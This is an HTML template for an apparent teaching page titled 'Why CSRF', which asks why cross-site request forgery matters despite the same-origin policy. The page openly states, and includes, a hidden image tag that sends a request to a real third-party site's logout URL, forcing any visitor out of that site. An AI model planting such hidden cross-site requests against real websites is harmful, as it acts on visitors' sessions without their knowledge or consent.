<!DOCTYPE html>
<html>

<head>
    <title>Why CSRF</title>
    <link rel="stylesheet" href="https://cdn.bootcss.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">   
    <link rel="stylesheet" href="/css/common.css">   
</head>

<body>
    {{>header}}
    <div class="container">
        <h1>为什么有同源策略的清苦下还需要CSRF</h1>
        <img src="/images/csrf.jpg" />
        <p>打开此页面会让你登出https://www.okchem.com/group-buying 系统</p>
        
        <img style="display:none" src="https://www.okchem.com/group-buying/logout">
        </div>
    </body>

</html>